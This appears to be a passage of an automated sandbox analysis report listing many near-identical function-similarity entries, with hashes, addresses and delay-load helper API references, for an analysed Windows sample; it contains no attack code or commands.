                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 040e208b532a9f639dfffb380a5eec99c1c422516b056f8f1886bdcb37167c4d
                                                                                                                        • Instruction ID: bada9c692b7420afb8e33c0c97f69fc9622cca7c81007b2a289a55450f2b8a7c
                                                                                                                        • Opcode Fuzzy Hash: 040e208b532a9f639dfffb380a5eec99c1c422516b056f8f1886bdcb37167c4d
                                                                                                                        • Instruction Fuzzy Hash: FDB012E125A100AC310851151E43D3701CCC5CAB10330703EF809F8280DC45BD020431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 6a1bbf94101e91887cfae837566761143e208b70adaa3499d4ca9d822f7d419d
                                                                                                                        • Instruction ID: 3f41c8f8e8b840d9bd32f238ab9c2900f811fe9fca0f9121cde3937cec81c2be
                                                                                                                        • Opcode Fuzzy Hash: 6a1bbf94101e91887cfae837566761143e208b70adaa3499d4ca9d822f7d419d
                                                                                                                        • Instruction Fuzzy Hash: 8EB012D125A100AC310851251D43D37018CC5CBB10330B03EFD09F8280D844FC010431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4d66d393fe70aba3cf94ef20225fa44921ad71a14b9fe47b65cdbfa770db2d0a
                                                                                                                        • Instruction ID: 17073b01ad332db683945f2820020e06380c7933e1a5a656905113423f8bdd6f
                                                                                                                        • Opcode Fuzzy Hash: 4d66d393fe70aba3cf94ef20225fa44921ad71a14b9fe47b65cdbfa770db2d0a
                                                                                                                        • Instruction Fuzzy Hash: B4B012D136B140AC310851151D43D37018DC9CAB10330703EF80AF8280D8447C010431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 36701a87e034736137f5b981bbb86bd9b99806b2a92a2ccb6125ffa34e7a2d5a
                                                                                                                        • Instruction ID: ad29215ade6ad8b982ed3492636e11dceb495de7356029280f2aa56612841645
                                                                                                                        • Opcode Fuzzy Hash: 36701a87e034736137f5b981bbb86bd9b99806b2a92a2ccb6125ffa34e7a2d5a
                                                                                                                        • Instruction Fuzzy Hash: 85B012D135B140AC310851151D43D37114DC5CBB10330B03EFC09F8280D844BC010431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 759d1b40a7d5900475070112981479d9e272eb2f7aec3d8568c4b7ba324d5fff
                                                                                                                        • Instruction ID: d99bdf10235473fe82d9f0d56dc3f7136f068f24b3fab2b5dee8934981f00d5b
                                                                                                                        • Opcode Fuzzy Hash: 759d1b40a7d5900475070112981479d9e272eb2f7aec3d8568c4b7ba324d5fff
                                                                                                                        • Instruction Fuzzy Hash: 76B012E135B240BC314852151D43D37014DC5CAB10330713EF809F8280D8457C450431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: bd6901ddad57a00995992a971afa7855bad5c8950c0cab625be6ecca8b4c31cb
                                                                                                                        • Instruction ID: 7ced4af6fc1432a680cf7779ce749d2c0e10e65a5504dcd74155e8a3678945e8
                                                                                                                        • Opcode Fuzzy Hash: bd6901ddad57a00995992a971afa7855bad5c8950c0cab625be6ecca8b4c31cb
                                                                                                                        • Instruction Fuzzy Hash: DAB012E125A200BC314851155D43D37014CC5CBF10330B13EF809F8280D8457D410431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 26fd1d87d2fe6adb9f6c89fbba75835597f5a5fc4b24cedcb6f39e421ef76464
                                                                                                                        • Instruction ID: 9f87c106a5f2bc50638d2f799eb5b59c546ee065a1560f32068fe998a3608757
                                                                                                                        • Opcode Fuzzy Hash: 26fd1d87d2fe6adb9f6c89fbba75835597f5a5fc4b24cedcb6f39e421ef76464
                                                                                                                        • Instruction Fuzzy Hash: BDB012E125A100AC310851165D43D37014CC5CBF10330B03EF809F8280D8447D010431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 739eedc6ea3dd2d5310e773e0b255fc4f1698f964c7673fea671c5588a9ed5b9
                                                                                                                        • Instruction ID: a405c5ecc677d91277092d262db682cfbe1eb401ad43e837342f35a5b1841822
                                                                                                                        • Opcode Fuzzy Hash: 739eedc6ea3dd2d5310e773e0b255fc4f1698f964c7673fea671c5588a9ed5b9
                                                                                                                        • Instruction Fuzzy Hash: 71B012E125A100AC310851155E43D37014CC5CBF10330B03EF809F8284DC457E020431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 5ffe75160f08eb46212d18455628dbdd6eb047387a011d9e0e50898fe405f347
                                                                                                                        • Instruction ID: 60933a01f875fc9dea81b6c30dc0e25324041a2b0bb95360720667a6e9f2234a
                                                                                                                        • Opcode Fuzzy Hash: 5ffe75160f08eb46212d18455628dbdd6eb047387a011d9e0e50898fe405f347
                                                                                                                        • Instruction Fuzzy Hash: 7DB012D125A100AC314852151E43D37014CC5CAB10330B13EF80DF8380DC557D0A0431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: a00912889378ca85572dcf6e73c4c3e740ddaddcd5a64be65de634f5a8d08199
                                                                                                                        • Instruction ID: 7c0a745db97f1bd984b544625da7db9abd82b66a251aeafefed185e5cd644c49
                                                                                                                        • Opcode Fuzzy Hash: a00912889378ca85572dcf6e73c4c3e740ddaddcd5a64be65de634f5a8d08199
                                                                                                                        • Instruction Fuzzy Hash: 17B012D135A240BC318852151D43D37014CC5CAB10330B23EF80DF8380D8447C450431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: b37f94d72b740654401f1a34e1872592debce070f8f04e01b69f84fe98e679d2
                                                                                                                        • Instruction ID: 5c815ffdf0b8c85bbc515038e8e567ffa2232c06e3c4afe8d086687f304c8bfc
                                                                                                                        • Opcode Fuzzy Hash: b37f94d72b740654401f1a34e1872592debce070f8f04e01b69f84fe98e679d2
                                                                                                                        • Instruction Fuzzy Hash: A1B012E125A100BC310851155D43D37014CC5CBF10330F03FFC09F8280D844BD010431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: e86a635f253105e09992088e6403f14ab949d40f585d4226092f378562bc3939
                                                                                                                        • Instruction ID: c75d305d73d8db5627d04b18732e51fad6affd318ca20e8c776f27841895b9b6
                                                                                                                        • Opcode Fuzzy Hash: e86a635f253105e09992088e6403f14ab949d40f585d4226092f378562bc3939
                                                                                                                        • Instruction Fuzzy Hash: 4AB012C1A592007C310C51646F03D37015CC1CAF14374762EF408F9280EC412D120531
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 480493f444bce47e36ba352c6b7f421421eb407b986e72e2e43cc666e47e5e2c
                                                                                                                        • Instruction ID: 729a51088c568d693bf724ad8fbfaf45fbd6412418f548c91eab4dc37bda60cf
                                                                                                                        • Opcode Fuzzy Hash: 480493f444bce47e36ba352c6b7f421421eb407b986e72e2e43cc666e47e5e2c
                                                                                                                        • Instruction Fuzzy Hash: 15B012C1A593007C314C51646E03D37015CC1CAF14334762EF408F9280E8402C410531
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 2fcb004a739b6c1a82af95ce4d1257d733045a9e1a67591f88eb7859fcf1b447
                                                                                                                        • Instruction ID: 48c639da85db0d1cdc355734cfe0533197714f825515bf321fd7c6aa759aa053
                                                                                                                        • Opcode Fuzzy Hash: 2fcb004a739b6c1a82af95ce4d1257d733045a9e1a67591f88eb7859fcf1b447
                                                                                                                        • Instruction Fuzzy Hash: 5FB012C1A592047D320C51642E03D37014CD1CAF14330742EF408F96C0E8402D010531
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: 233fe15aab6f69fc9aae8055e8e3502e5912d8573b8d9bb4e8378dff5f0b7012
                                                                                                                        • Instruction ID: 89ec0fe758a7ec59485f0ea33416baad7ad27dfa3b48bdc00df82cfe563f0ab6
                                                                                                                        • Opcode Fuzzy Hash: 233fe15aab6f69fc9aae8055e8e3502e5912d8573b8d9bb4e8378dff5f0b7012
                                                                                                                        • Instruction Fuzzy Hash: 16B012C1A582007C320861186E03D3F054DC1CBF14370722FF408F8280EC402C450431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
